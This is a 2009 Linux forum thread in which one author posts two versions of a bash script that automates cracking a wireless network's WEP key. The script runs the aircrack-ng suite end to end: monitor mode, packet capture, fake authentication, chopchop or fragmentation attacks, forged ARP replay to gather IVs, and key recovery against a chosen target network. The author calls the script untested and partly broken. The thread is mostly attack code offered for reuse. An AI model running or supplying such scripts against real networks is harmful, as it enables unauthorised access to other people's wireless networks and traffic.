Register
It is currently Sat Nov 29, 2014 12:13 am

WiFi WEP cracking (aircrack-ng)


All times are UTC - 6 hours


Post new topic Reply to topic  [ 2 posts ] 
Author Message
 PostPosted: Thu Aug 20, 2009 10:56 am   

Joined: Sat Aug 15, 2009 11:07 am
Posts: 6
Location: South Africa
I have a hobby that's breaking wifi networks (with permission, of course!), so I made this script to get a little practice in scripting.
So far I have dumped all the necessary commands for the WEP cracking process. Needs a little cleaning up!
It also assumes you're in the directory you want to dump all the files. Maybe could add a 'rm' as a clean-up?

This is only my third script so some stuff I have not got around to learning.
I would like some help in finding a way to run some of the commands in new terminals or shells. This has to be done.
Also, I need to make the 'for' loop (highlighted by "###") run each of the variable assignment commands for each of the searched networks found. I'll get there, but maybe someone has a good way?

Any other help would be appreciated! =D>

I apologize for the mess! :))

--- EDIT --- 22.08.09
--------------------
updated the script into something a little more workable. Still in progress as I haven't tested it fully yet, only segments.
The netlist_auto method is VERY inefficient and needs more work.[size=85][/size]
Still need advice for running processes in external shells (ideally in a split Terminator terminal! :) )
--------------------


Code:
#!/bin/bash
#
# --------------------
# Script to create an easy WEP cracking process
# --------------------
# Created by Adam 19.08.09
# --------------------
#
# --------------------
# VARIABLES
# --------------------
#
wifi_device=              # prompted at start of script
source_address=      # auto collected after obtaining $wifi_device
source_device=      # prompted after enabling monitor mode
target_address=      # prompted after choosing target network
target_channel=      # prompted after choosing target network      
target_essid=              # prompted after choosing target network
networks_count=      # auto collected when running a network scan
i=1                         # counter in displaying broadcasting networks
choice=                 # prompted at CHOPCHOP|FRAGMENT
capture_files=              # prompted when capturing packets
packetforge_packet=   # prompted when building the packet to replay
cleanup_answer=      # prompted at clean_up Y|N
net_choice=               # prompted at network choice
# --------------------
# FUNCTIONS
# --------------------
function clean_up() {
   echo "Script terminated. Cleaning created files"
   # removed all files created
   exit 0
   }

function  netlist_manual() {
   # print iwlist in LESS, then enter the target
   echo "Choose the WEP target (ADDRESS, CHANNEL and ESSID)"
   echo -n "(Enter to continue...)"
   read
   # print the network list in LESS reader
   iwlist $wifi_device scanning | less
   echo -n "Enter the ADDRESS > "
   read target_address
   echo -n "Enter the ESSID > "
   read target_essid
   echo -n "Enter the CHANNEL > "
   read target_channel
   }
   
function netlist_auto() {
   ##################################################
   # The following commands extract the variables needed from the iwlist command
   # Still need to
   #   1) and from there choose the desired WEP network
   # the following should then gather the data needed
   ##################################################
   networks_count=`iwlist wlan0 scanning | grep -E -o -c "Cell [0-9]+[0-9]"`
   clear
   echo "$networks_count networks found"
   echo ""
   for each in $(seq $networks_count)
      do
         # Need to reduce the number of iwlist calls (6x per network found) -  maybe store in a text file
         target_address=$(iwlist $wifi_device scan | grep -E "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | awk '/Address/ {print $5}')
         target_channel=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2)
         target_essid=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2)
         target_encrypt=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '7p' | cut -d ":" -f2)
         #cat ~/iwlist_script_networks | grep -E "`cat ~/test | sed -n "${i}p"`" | awk '/Address/ {print $5}'
         #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2
         #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2
         echo "Network #$i"
         echo "--------------------"
         echo "Address: $target_address"      # need to fix the assignment of variables here
         echo "ESSID: $target_essid"      #
         echo "Channel: $target_channel"      #
         echo ""
         i=`expr $i + 1`
   done
   ###############################################
   }   
# --------------------
# MAIN
# --------------------
#
trap clean_up SIGHUP SIGTERM  SIGINT
#mkdir ~/temp_caps/


# enter my wifi device
clear
echo "This is a script to crack a WEP encrypted network with very little input"
echo "--------------------"
echo -n "Enter your WIFI device > "
read wifi_device
# obtain my MAC address
source_address=`ifconfig $wifi_device | awk /'HWaddr/ {print $5}'`
echo "MAC Address being used: $source_address"
sleep 2
while [ "$net_choice" = "" ]; do
   echo "Choose method for displaying networks:"
   echo "   1) manual input method"
   echo "   2) auto-choice method (broken)"
   echo ""
   echo -n "Enter you choice > "
   read net_choice
      case $net_choice in
         1 )    #
            netlist_manual         
            ;;
         2 )    #
            netlist_auto
            ;;
         * )    echo "Not a valid choice!"
            sleep 2
            net_choice=
            clear
            ;;
      esac
   done

# start the wifi device in MONITOR MODE and obtain the NEW DEVICE
sudo airmon-ng start $wifi_device $target_channel
echo -n "Enter the new monitor-enabled interface > "; read source_device

# capture the packets and IV's using AIRODUMP-NG
# -------------------- need to do this in another window
echo "Starting airodump-ng to capture the packets needed..."
echo -n "Specify the name of the capture file > "; read capture_files
sudo airodump-ng -c $target_channel --bssid $target_address --write $capture_files $source_device

# use AIREPLAY-NG for FAKE AUTHENTICATION
# will continue to send keep-alive requests, incase the target refreshes (DHCP)
# -------------------- need to do this in another window
echo "Fake authenticating with target using aireplay-ng..."
sudo aireplay-ng --fakeauth 1 -q 5 -e $target_essid -a $target_address -h $source_address $source_device ## -q -- keep alive requests
################################

# choose between the CHOP-CHOP or FRAGMENT method for building packets
# -------------------- need to be in another window
while [ "$choice" = "" ]; do
   echo "need to build an ARP packet. Please choose either the 'chopchop' or 'fragment' method... "
   echo -n "Enter you choice > "
   read choice
      case $choice in
         chopchop )    # brute force an ARP packet from CHOP-CHOP
               echo "please follow the instructions..."
               sudo aireplay-ng --chopchop -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         fragment )    # send FRAGMENTED packet to target, returning nesissary data
               echo "please follow the instructions..."
               sudo aireplay-ng --fragment -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         * )       echo "Not a valid choice"
               echo ""
               choice=
            ;;
      esac
   done
################################
echo "Using packetforge-ng to create the new packet..."
echo -n "Enter the filename for the newly built packet > "
read packetforge_packet
sudo packetforge-ng -0 -y *.xor -a $target_address -h $source_address -k 255.255.255.255 -l 255.255.255.255 -w ${packetforge_packet}.cap

# using AIREPLAY-NG to generate IV's
echo "Using aireplay-ng to bombard target and generate IV's..."
sudo aireplay-ng --arpreplay-ng -e $target_essid -a $target_address -h $source_address -r ${packetforge_packet}.cap $source_device

# using AIRCRACK-NG to release the passkey
echo "Going to crack the passkey with aircrack-ng..."
sudo aircrack-ng -l $target_essid ~/${capture_files}.*

clear
echo "Key-file is in your home directory, filled under (router ESSID).(router MAC).*"

clear
while [ "$cleanup_answer" = "" ]; do
   echo -n "Would you like to remove all other files, packets and captures [y/n]? > "
   read cleanup_answer
      case $cleanup_answer in
         y)   #
            echo "Cleaning up..."
            clean_up
            ;;
         n)   #
            echo "leaving files alone... N chosen"
            ;;
         *)   #
            echo "Not a valid choice.."   
            sleep 2
            clear
            cleanup_answer=
            ;;
      esac
   done


Top
 Profile  
 PostPosted: Sat Aug 29, 2009 2:42 am   

Joined: Sat Aug 15, 2009 11:07 am
Posts: 6
Location: South Africa
Here is the (almost) completed version. I have not had the chance to test it, so there may be a few glitches here, and there.

It requires that aircrack-ng is installed, and I think that's about it.
The script creates a temporary directory for all the packet captures etc., and prompts you to clean up all the files in the end. I have not tried outputting the cracked key to a file yet (one of the last commands), but just remove that option if it doesn't work and comment out the 'clear' command, so you can at least see the key on the terminal.

Cut me a little slack if it's not efficient coding :P - this is only my second script!

Code:
#!/bin/bash
#
# --------------------
# Script to create an easy WEP cracking process
# --------------------
# CHANGES
#
#   ++ make temporary directory for files and captures & store outputs in them
#      --done 25.08.09
#      --needs testing
#   ++ remove files in clean_up function
#      --done 25.08.09
#      --needs testing
#   ++ fix check_for_errors function & add to nessicary commands
#      --done 25.08.09
#       --needs testing
#   ++ run commands in different terminals
#      --done 25.08.09
#      --needs testing
#   ++ fix netlist_auto function (print to file and extract information)
#
# --------------------
# Created by Adam 19.08.09
# --------------------
#
# --------------------
# VARIABLES - do not set if not already!
# --------------------
#
directory=$(date "+%a.%d.%b.%y")
wifi_device=              # device name for wifi
source_address=      # my MAC address for all commands
source_device=      # device with enabled monitor-mode
target_address=      # choice for choosing target network
target_channel=      # choice for target network      
target_essid=              # choice for target network
networks_count=      # number of networks for AUTO network-gather loop
i=1                         # counter in displaying broadcasting networks
choice=                 # for choosing CHOPCHOP | FRAGMENT
cleanup_answer=      # clean_up function Y|N
net_choice=              # loop for MANUAL | AUTO available networks
pid_airodump=      # process ID of packet collecting with AIRODUMP-NG
pid_aireplay_fake=           # process ID of fake-authentication with AIREPLAY-NG
pid_aireplay_iv=           # process ID of generating IV's with AIREPLAY-NG
#
# --------------------
# FUNCTIONS
# --------------------
#
# Clean up all captured files and created directories.
# Kill all separate and background processes.
function clean_up() {
   while [ "$cleanup_answer" = "" ]; do
      clear
      echo "killing all background processes..."
      kill pid_airodump
      kill pid_aireplay_fake
      kill pid_aireplay_iv
      killall xterm
      echo -n "Would you like to remove all other files, packets and captures [y/n]? > "
      read cleanup_answer
      case $cleanup_answer in
         y)   # remove all created files
            echo "Cleaning up..."
            # if ~/captures/${directory} exists
               if [ -d ~/captures/${directory} ]
                  then
                     rm -rv ~/captures/${directory}
                     echo "All clean!"
                     exit 0
                  else
                     echo "Directory ~/captures/$directory does not exist"
                     echo "Cannot remove files...you'll have to find them"
                     exit 1
                  fi
            ;;
         n)   # leave all files alone
            echo "leaving files alone..."
            ;;
         *)   # cycle menu
            echo "Not a valid choice.."   
            sleep 2
            clear
            cleanup_answer=
            ;;
         esac
      done
   }
#
function  netlist_manual() {
   # print iwlist in LESS, then enter the target
   echo "Choose the WEP target (ADDRESS, CHANNEL and ESSID)"
   echo -n "(Enter to continue...)"
   read
   # print the network list in LESS reader
   iwlist $wifi_device scanning
   echo ""
   echo -n "Enter the ADDRESS > "
   read target_address
   echo -n "Enter the ESSID > "
   read target_essid
   echo -n "Enter the CHANNEL > "
   read target_channel
   }
#
function netlist_auto() {
   ##############################################
        # The following commands extract the variables needed from the iwlist command
   # VERY BUGGY
   # need to print to file then extract details from there
   ##############################################
   #networks_count=`iwlist wlan0 scanning | grep -E -o -c "Cell [0-9]+[0-9]"`
   #clear
   #echo "$networks_count networks found"
   #echo ""
   #for each in $(seq $networks_count)
   #   do
   #      # Need to reduce the number of iwlist calls (6x per network found) -  maybe store in a text file
   #      target_address=$(iwlist $wifi_device scan | grep -E "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | awk '/Address/ {print $5}')
   #      target_channel=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2)
   #      target_essid=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2)
   #      target_encrypt=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '7p' | cut -d ":" -f2)
   #      #cat ~/iwlist_script_networks | grep -E "`cat ~/test | sed -n "${i}p"`" | awk '/Address/ {print $5}'
   #      #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2
   #      #cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2
   #      echo "Network #$i"
   #      echo "--------------------"
   #      echo "Address: $target_address"      # need to fix the assignment of variables here
   #      echo "ESSID: $target_essid"      #
   #      echo "Channel: $target_channel"      #
   #      echo ""
   #      i=`expr $i + 1`
   #done
   }   
#
function check_for_errors() {
   if [ $? -ne 0 ]
      then
         echo "There was a problem completing previous command."
         echo ""
         echo "Running cleanup..."
         sleep 1
         clean_up
      fi
   }
#
# --------------------
# MAIN
# --------------------
#
trap clean_up SIGHUP SIGTERM  SIGINT
#
#  check if temp dir exists
if [ -d ~/captures/${directory} ]
   then
      echo "Locating to temporary directory ~/captures/${directory}/ ..."
      cd ~/captures/${directory}
   else   
      echo "Creating & locating to temporary directory ~/captures/${directory}/ ..."
      mkdir -p ~/captures/${directory} && cd ~/captures/${directory}
      check_for_errors
   fi
#
# enter my wifi device
clear
echo "This is a script to crack a WEP encrypted network with very little input"
echo "--------------------"
echo ""
echo -n "Enter your WIFI device > "
read wifi_device
#
# obtain my MAC address
source_address=`ifconfig $wifi_device | awk /'HWaddr/ {print $5}'`
echo "MAC Address being used: ${source_address}"
echo -n "(Enter to continue...)"
read
#
# method for obtaining network details
while [ "$net_choice" = "" ]; do
   clear
   echo "Choose meethod for displaying networks:"
   echo ""
   echo "   1) manual input method"
   echo "   2) auto-choice method (broken)"
   echo ""
   echo -n "Enter you choice > "
   read net_choice
      case $net_choice in
         1 )    # execute less reader and manual input
            netlist_manual         
            ;;
         2 )    # print to file and extract details
            netlist_auto
            ;;
         * )    echo "Not a valid choice!"
            sleep 2
            net_choice=
            clear
            ;;
      esac
   done
#
# start the wifi device in MONITOR MODE and obtain the NEW DEVICE
sudo airmon-ng start $wifi_device $target_channel
check_for_errors
echo -n "Enter the new monitor-enabled interface > "; read source_device
#
# capture the packets and IV's using AIRODUMP-NG
echo "Starting airodump-ng to capture the packets needed..."
xterm -e sudo airodump-ng -c $target_channel --bssid $target_address -w captures $source_device
pid_airodump=$!
#
# use AIREPLAY-NG for FAKE AUTHENTICATION
echo "Fake authenticating with target using aireplay-ng..."
xterm -e sudo aireplay-ng --fakeauth 1 -q 5 -e $target_essid -a $target_address -h $source_address $source_device # -q -- keep alive requests
pid_aireplay_fake=$!
#
# choose between the CHOP-CHOP or FRAGMENT method for building packets
while [ "$choice" = "" ]; do
   echo "need to build an ARP packet. Please choose either the 'chopchop' or 'fragment' method... "
   echo -n "Enter you choice > "
   read choice
      case $choice in
         chopchop )    # brute force an ARP packet from CHOP-CHOP
               echo "please follow the instructions..."
               sudo aireplay-ng --chopchop -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         fragment )    # send FRAGMENTED packet to target, returning nesissary data
               echo "please follow the instructions..."
               sudo aireplay-ng --fragment -e $target_essid -a $target_address -h $source_address $source_device
            ;;
         * )       echo "Not a valid choice"
               echo ""
               choice=
            ;;
         esac
   done
#
# using PACKETFORGE-NG to build new packet to replay
echo "Using packetforge-ng to create the new packet..."
sudo packetforge-ng -0 -y *.xor -a $target_address -h $source_address -k 255.255.255.255 -l 255.255.255.255 -w packet.cap
check_for_errors
#
# using AIREPLAY-NG to generate IV's
echo "Using aireplay-ng to bombard target and generate IV's..."
xterm -e sudo aireplay-ng --arpreplay-ng -e $target_essid -a $target_address -h $source_address -r packet.cap $source_device
pid_aireplay_iv=$!
#
# using AIRCRACK-NG to release the passkey
echo "Going to crack the passkey with aircrack-ng..."
sudo aircrack-ng -l ~/${target_essid}.key *.cap
#
#
clear
echo "Key-file is in your home directory, filled under (router ESSID).(router MAC).*"

clear
clean_up


Top
 Profile  
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 2 posts ] 

All times are UTC - 6 hours


Who is online

Users browsing this forum: No registered users and 4 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
cron


BashScripts | Promote Your Page Too
Powered by phpBB © 2011 phpBB Group
© 2003 - 2011 USA LINUX USERS GROUP